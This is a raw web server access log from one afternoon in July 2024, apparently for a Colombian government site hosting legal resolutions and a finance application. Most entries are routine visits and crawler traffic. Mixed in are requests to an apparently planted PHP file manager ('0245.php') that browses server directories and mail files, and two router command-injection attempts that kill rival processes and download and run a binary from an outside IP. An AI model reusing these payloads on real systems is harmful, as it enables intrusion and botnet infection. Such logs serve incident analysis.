191.156.58.101 - - [07/Jul/2024:14:24:25 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [07/Jul/2024:14:24:25 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
191.156.58.101 - - [07/Jul/2024:14:24:25 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.58.101 - - [07/Jul/2024:14:24:25 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1396
191.156.58.101 - - [07/Jul/2024:14:24:31 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 13576
191.156.58.101 - - [07/Jul/2024:14:24:34 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 121894
191.156.58.101 - - [07/Jul/2024:14:24:36 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
191.156.58.101 - - [07/Jul/2024:14:24:36 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.58.101 - - [07/Jul/2024:14:24:36 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.49.78 - - [07/Jul/2024:14:24:36 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.49.78 - - [07/Jul/2024:14:24:36 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.49.78 - - [07/Jul/2024:14:24:37 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.49.78 - - [07/Jul/2024:14:24:37 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
191.156.49.78 - - [07/Jul/2024:14:24:37 -0500] "GET /sipse/faces/javax.faces.resource/dynamiccontent.properties?ln=primefaces&pfdrid=XjOR5%2F%2FfPAZAuY9TpWQeCiM0BhlXxYRBGKi%2FQcXXfeA%3D&pfdrid_c=false HTTP/1.1" 500 383
201.245.192.253 - - [07/Jul/2024:14:25:15 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [07/Jul/2024:14:23:47 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.47.171 - - [07/Jul/2024:14:25:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&c=1&f=7426.pdf HTTP/1.1" 200 2739
216.245.221.92 - - [07/Jul/2024:14:25:41 -0500] "HEAD / HTTP/1.1" 200 -
47.128.47.157 - - [07/Jul/2024:14:25:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&c=1&f=8325.pdf HTTP/1.1" 200 2739
47.128.119.115 - - [07/Jul/2024:14:25:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=sess_5l1hbicvdjr8c5i7qlbjhrc3b4 HTTP/1.1" 200 2715
47.128.119.164 - - [07/Jul/2024:14:26:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&c=1&f=7980.pdf HTTP/1.1" 200 2741
47.128.43.135 - - [07/Jul/2024:14:26:14 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202004%2FRES%202004%202151-2200%2F&order=asc&sort=name HTTP/1.1" 200 12359
201.245.192.253 - - [07/Jul/2024:14:26:15 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [07/Jul/2024:14:24:38 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55823
201.245.192.253 - - [07/Jul/2024:14:26:25 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [07/Jul/2024:14:26:29 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 29994
201.245.192.253 - - [07/Jul/2024:14:26:30 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35051
172.22.2.4 - - [07/Jul/2024:14:25:18 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.20 - - [07/Jul/2024:14:27:06 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/3239.pdf HTTP/1.1" 304 -
201.245.192.253 - - [07/Jul/2024:14:27:15 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [07/Jul/2024:14:28:15 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [07/Jul/2024:14:28:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38712
201.245.192.253 - - [07/Jul/2024:14:28:25 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [07/Jul/2024:14:28:48 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35058
201.245.192.253 - - [07/Jul/2024:14:29:15 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [07/Jul/2024:14:29:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/0953.pdf HTTP/1.1" 200 2355215
201.245.192.253 - - [07/Jul/2024:14:30:15 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [07/Jul/2024:14:30:25 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [07/Jul/2024:14:30:41 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [07/Jul/2024:14:31:15 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [07/Jul/2024:14:31:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1270.pdf HTTP/1.1" 200 2905285
172.22.2.4 - - [07/Jul/2024:14:29:37 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [07/Jul/2024:14:31:33 -0500] "GET /BLA/boletinlegal/ab2g HTTP/1.1" 404 1018
172.22.2.4 - - [07/Jul/2024:14:31:33 -0500] "GET /BLA/boletinlegal/ab2h HTTP/1.1" 404 1018
172.22.2.4 - - [07/Jul/2024:14:31:33 -0500] "GET /BLA/boletinlegal/alive.php HTTP/1.1" 404 1018
172.22.2.4 - - [07/Jul/2024:14:31:46 -0500] "GET /BLA/boletinlegal/t4 HTTP/1.1" 404 1018
172.22.2.4 - - [07/Jul/2024:14:31:47 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1018
201.245.192.253 - - [07/Jul/2024:14:29:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 14506
172.22.2.4 - - [07/Jul/2024:14:31:58 -0500] "GET /BLA/boletinlegal/teorema505?t=1 HTTP/1.1" 404 1018
216.244.66.195 - - [07/Jul/2024:14:31:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1520.pdf HTTP/1.1" 200 799275
172.22.2.4 - - [07/Jul/2024:14:30:28 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54913
201.245.192.253 - - [07/Jul/2024:14:32:15 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [07/Jul/2024:14:32:22 -0500] "GET /BLA/boletinlegal/jurisprudencia.php HTTP/1.1" 200 17637
201.245.192.253 - - [07/Jul/2024:14:32:25 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [07/Jul/2024:14:31:36 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 32715
172.22.2.4 - - [07/Jul/2024:14:31:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
216.244.66.195 - - [07/Jul/2024:14:32:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1805.pdf HTTP/1.1" 200 513175
47.128.63.32 - - [07/Jul/2024:14:32:59 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202006%2FRES%202006%201901-1950%2F&order=desc&sort=date HTTP/1.1" 200 12359
47.128.33.206 - - [07/Jul/2024:14:33:10 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202002%2FRES%202002%201151-1200%2F&order=desc&sort=date HTTP/1.1" 200 12143
201.245.192.253 - - [07/Jul/2024:14:33:14 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38712
201.245.192.253 - - [07/Jul/2024:14:33:15 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.110.202 - - [07/Jul/2024:14:33:20 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202004%2FRES%202004%20301-350%2F&order=asc&sort=name HTTP/1.1" 200 12062
47.128.112.118 - - [07/Jul/2024:14:33:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=4808.pdf HTTP/1.1" 200 2740
47.128.118.47 - - [07/Jul/2024:14:33:42 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=4846.pdf HTTP/1.1" 200 2740
216.244.66.195 - - [07/Jul/2024:14:33:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1918.pdf HTTP/1.1" 200 370532
47.128.17.125 - - [07/Jul/2024:14:33:52 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202004%2FRES%202004%20251-300%2F&order=desc&sort=name HTTP/1.1" 200 12043
47.128.35.215 - - [07/Jul/2024:14:34:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=06898.pdf HTTP/1.1" 200 2742
198.235.24.230 - - [07/Jul/2024:14:34:07 -0500] "\x16\x03\x01" 400 226
198.235.24.230 - - [07/Jul/2024:14:34:07 -0500] "\x16\x03\x01" 400 226
47.128.120.19 - - [07/Jul/2024:14:34:13 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202006%2FRES%202006%20551-600%2F&order=asc&sort=name HTTP/1.1" 200 12250
201.245.192.253 - - [07/Jul/2024:14:34:15 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.35.255 - - [07/Jul/2024:14:34:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=1899-.pdf HTTP/1.1" 200 2740
201.245.192.253 - - [07/Jul/2024:14:34:25 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.120.193 - - [07/Jul/2024:14:34:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=5677.pdf HTTP/1.1" 200 2740
172.22.2.4 - - [07/Jul/2024:14:34:35 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
172.22.2.4 - - [07/Jul/2024:14:34:36 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [07/Jul/2024:14:34:36 -0500] "GET /BLA/boletinlegal/niceforms-default.css HTTP/1.1" 200 6694
172.22.2.4 - - [07/Jul/2024:14:34:36 -0500] "GET /BLA/boletinlegal/styles2.css HTTP/1.1" 200 1838
172.22.2.4 - - [07/Jul/2024:14:34:36 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
172.22.2.4 - - [07/Jul/2024:14:34:36 -0500] "GET /BLA/boletinlegal/niceforms.js HTTP/1.1" 200 22876
172.22.2.4 - - [07/Jul/2024:14:34:36 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [07/Jul/2024:14:34:36 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [07/Jul/2024:14:34:36 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [07/Jul/2024:14:34:36 -0500] "GET /BLA/boletinlegal/images/cabezote%20BLEGAL.jpg HTTP/1.1" 200 118164
172.22.2.4 - - [07/Jul/2024:14:34:36 -0500] "GET /BLA/boletinlegal/images/subscribe-icon-big.png HTTP/1.1" 200 47702
172.22.2.4 - - [07/Jul/2024:14:34:36 -0500] "GET /BLA/boletinlegal/images/historia.png HTTP/1.1" 200 52775
172.22.2.4 - - [07/Jul/2024:14:34:36 -0500] "GET /BLA/boletinlegal/images/green-yellow-blue-pink-th.png HTTP/1.1" 200 7394
172.22.2.4 - - [07/Jul/2024:14:34:36 -0500] "GET /BLA/boletinlegal/images/tel.png HTTP/1.1" 200 14477
172.22.2.4 - - [07/Jul/2024:14:34:36 -0500] "GET /BLA/boletinlegal/images/registro-usuarios.png HTTP/1.1" 200 8106
172.22.2.4 - - [07/Jul/2024:14:34:36 -0500] "GET /BLA/boletinlegal/images/icono-email.png HTTP/1.1" 200 5544
172.22.2.4 - - [07/Jul/2024:14:34:36 -0500] "GET /BLA/boletinlegal/images/body_bg.jpg HTTP/1.1" 200 1601
172.22.2.4 - - [07/Jul/2024:14:34:36 -0500] "GET /BLA/boletinlegal/images/menu_lft.gif HTTP/1.1" 200 1713
172.22.2.4 - - [07/Jul/2024:14:34:36 -0500] "GET /BLA/boletinlegal/images/menu_rght.gif HTTP/1.1" 200 1627
172.22.2.4 - - [07/Jul/2024:14:34:36 -0500] "GET /BLA/boletinlegal/images/bg_top.jpg HTTP/1.1" 200 522
172.22.2.4 - - [07/Jul/2024:14:34:36 -0500] "GET /BLA/boletinlegal/images/menu_bg.jpg HTTP/1.1" 200 620
172.22.2.4 - - [07/Jul/2024:14:34:36 -0500] "GET /BLA/boletinlegal/images/hover.jpg HTTP/1.1" 200 640
172.22.2.4 - - [07/Jul/2024:14:34:36 -0500] "GET /BLA/boletinlegal/images/footer_bg.jpg HTTP/1.1" 200 586
172.22.2.4 - - [07/Jul/2024:14:34:36 -0500] "GET /BLA/boletinlegal/images/text.jpg HTTP/1.1" 200 568
172.22.2.4 - - [07/Jul/2024:14:34:36 -0500] "GET /BLA/boletinlegal/images/footer_bg_l.jpg HTTP/1.1" 200 776
172.22.2.4 - - [07/Jul/2024:14:34:36 -0500] "GET /BLA/boletinlegal/img/0.png HTTP/1.1" 200 110
172.22.2.4 - - [07/Jul/2024:14:34:36 -0500] "GET /BLA/boletinlegal/img/select-left.png HTTP/1.1" 200 263
172.22.2.4 - - [07/Jul/2024:14:34:36 -0500] "GET /BLA/boletinlegal/img/select-right.png HTTP/1.1" 200 44019
172.22.2.4 - - [07/Jul/2024:14:34:36 -0500] "GET /BLA/boletinlegal/img/button-left.png HTTP/1.1" 200 57071
172.22.2.4 - - [07/Jul/2024:14:34:36 -0500] "GET /BLA/boletinlegal/img/button.png HTTP/1.1" 200 43241
172.22.2.4 - - [07/Jul/2024:14:34:36 -0500] "GET /BLA/boletinlegal/img/button-right.png HTTP/1.1" 200 57878
172.22.2.4 - - [07/Jul/2024:14:34:36 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1326
216.244.66.195 - - [07/Jul/2024:14:34:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/2123.pdf HTTP/1.1" 200 1080635
47.128.37.191 - - [07/Jul/2024:14:34:57 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202006%2FAUTOS%202006%20801-900%2F&order=desc&sort=size HTTP/1.1" 200 21774
201.245.192.253 - - [07/Jul/2024:14:35:15 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [07/Jul/2024:14:35:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0049.pdf HTTP/1.1" 200 384562
216.245.221.92 - - [07/Jul/2024:14:35:41 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.20 - - [07/Jul/2024:14:35:54 -0500] "GET /Publicaciones/2024EE84860.pdf HTTP/1.1" 404 227
66.249.66.19 - - [07/Jul/2024:14:35:55 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/10624.pdf HTTP/1.1" 200 612386
66.249.66.19 - - [07/Jul/2024:14:35:55 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/CUADRO%20SENTENCIA%20T-299%20DE%202008.doc HTTP/1.1" 304 -
201.245.192.253 - - [07/Jul/2024:14:36:15 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [07/Jul/2024:14:36:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0243.pdf HTTP/1.1" 200 495231
201.245.192.253 - - [07/Jul/2024:14:36:25 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [07/Jul/2024:14:35:27 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [07/Jul/2024:14:37:09 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0307.pdf HTTP/1.1" 200 733336
201.245.192.253 - - [07/Jul/2024:14:37:15 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [07/Jul/2024:14:36:30 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 29994
201.245.192.253 - - [07/Jul/2024:14:37:30 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35051
172.22.2.4 - - [07/Jul/2024:14:37:43 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/CUADRO%20SENTENCIA%20T-299%20DE%202008.doc HTTP/1.1" 200 40960
172.22.2.4 - - [07/Jul/2024:14:36:18 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 45104
216.244.66.195 - - [07/Jul/2024:14:37:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0744.pdf HTTP/1.1" 200 305362
40.77.167.53 - - [07/Jul/2024:14:38:12 -0500] "GET /%C3%82%C2%A1vuelve-la-atencion-presencial-la-sede-principal-de-la-secretaria-de-ambiente-reabre-sus-puertas-al-publico.html HTTP/1.1" 200 979
201.245.192.253 - - [07/Jul/2024:14:38:15 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [07/Jul/2024:14:38:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38712
172.22.2.4 - - [07/Jul/2024:14:36:41 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [07/Jul/2024:14:38:25 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [07/Jul/2024:14:38:43 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0940.pdf HTTP/1.1" 200 403154
201.245.192.253 - - [07/Jul/2024:14:38:48 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35054
52.167.144.229 - - [07/Jul/2024:14:39:06 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2006%2FAUTOS+2006+601-700%2F HTTP/1.1" 200 21776
201.245.192.253 - - [07/Jul/2024:14:39:15 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [07/Jul/2024:14:39:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/0993.pdf HTTP/1.1" 200 465826
201.245.192.253 - - [07/Jul/2024:14:39:38 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35051
201.245.192.253 - - [07/Jul/2024:14:40:15 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [07/Jul/2024:14:40:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1766.pdf HTTP/1.1" 200 424695
201.245.192.253 - - [07/Jul/2024:14:40:25 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.20 - - [07/Jul/2024:14:40:28 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/10552.pdf HTTP/1.1" 200 392397
216.245.221.92 - - [07/Jul/2024:14:40:41 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [07/Jul/2024:14:41:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1952.pdf HTTP/1.1" 200 3291861
201.245.192.253 - - [07/Jul/2024:14:41:15 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.244.66.195 - - [07/Jul/2024:14:41:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1972.pdf HTTP/1.1" 200 283555
47.128.120.70 - - [07/Jul/2024:14:42:07 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202004%2FRES%202004%201901-1950%2F&order=desc&sort=size HTTP/1.1" 200 12349
201.245.192.253 - - [07/Jul/2024:14:42:15 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.120.61 - - [07/Jul/2024:14:42:18 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%202006%2FAUTOS%202006%20301-400%2F&order=desc&sort=name HTTP/1.1" 200 21780
201.245.192.253 - - [07/Jul/2024:14:42:25 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
47.128.120.99 - - [07/Jul/2024:14:42:28 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202007%2FRES%202007%20901%20AL%201000%2F&order=desc&sort=name HTTP/1.1" 200 26733
216.244.66.195 - - [07/Jul/2024:14:42:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202017/1983.pdf HTTP/1.1" 200 304902
47.128.63.59 - - [07/Jul/2024:14:42:39 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202003%2FRES%202003%20101-150%2F&order=desc&sort=size HTTP/1.1" 200 12354
47.128.120.50 - - [07/Jul/2024:14:42:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=4679.pdf HTTP/1.1" 200 2739
172.22.2.4 - - [07/Jul/2024:14:41:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
47.128.117.205 - - [07/Jul/2024:14:43:00 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202002%2FRES%202002%20751-800%2F&order=desc&sort=size HTTP/1.1" 200 12566
47.128.22.22 - - [07/Jul/2024:14:43:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Cmailoutput%5C&f=mail-20150902-1716-495000.txt&ft=img HTTP/1.1" 200 14770
201.245.192.253 - - [07/Jul/2024:14:43:11 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38712
201.245.192.253 - - [07/Jul/2024:14:43:15 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.111.195 - - [07/Jul/2024:14:43:21 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021%5C&f=3003.pdf&ft=img HTTP/1.1" 200 15949
47.128.117.209 - - [07/Jul/2024:14:43:32 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=4293.pdf HTTP/1.1" 200 2739
116.203.250.97 - - [07/Jul/2024:14:43:35 -0500] "GET / HTTP/1.1" 200 4720
47.128.111.182 - - [07/Jul/2024:14:43:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=6510.pdf HTTP/1.1" 200 2740
172.22.2.4 - - [07/Jul/2024:14:42:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
201.245.192.253 - - [07/Jul/2024:14:44:15 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [07/Jul/2024:14:44:25 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
152.203.58.57 - - [07/Jul/2024:14:45:01 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 49415
152.203.58.57 - - [07/Jul/2024:14:45:06 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 34906
45.148.10.174 - - [07/Jul/2024:14:45:10 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 1018
45.148.10.174 - - [07/Jul/2024:14:45:10 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.95.169.11%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 1018
201.245.192.253 - - [07/Jul/2024:14:45:15 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
216.245.221.92 - - [07/Jul/2024:14:45:41 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.52 - - [07/Jul/2024:14:45:57 -0500] "GET /dia-mundial-del-reciclaje-conoce-como-gestionar-los-residuos-especiales-y-peligrosos.html HTTP/1.1" 200 831
201.245.192.253 - - [07/Jul/2024:14:46:15 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [07/Jul/2024:14:46:25 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
52.167.144.23 - - [07/Jul/2024:14:46:51 -0500] "GET /Publicaciones/2023EE309216.pdf HTTP/1.1" 404 228
201.245.192.253 - - [07/Jul/2024:14:47:15 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [07/Jul/2024:14:48:08 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 38712
201.245.192.253 - - [07/Jul/2024:14:48:15 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
40.77.167.33 - - [07/Jul/2024:14:48:24 -0500] "GET /conoce-las-medidas-de-prevencion-y-mitigacion-contempladas-en-la-alerta-fase-1-por-calidad-del-aire.html HTTP/1.1" 200 917
201.245.192.253 - - [07/Jul/2024:14:48:25 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [07/Jul/2024:14:47:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
152.203.58.57 - - [07/Jul/2024:14:49:03 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 59013
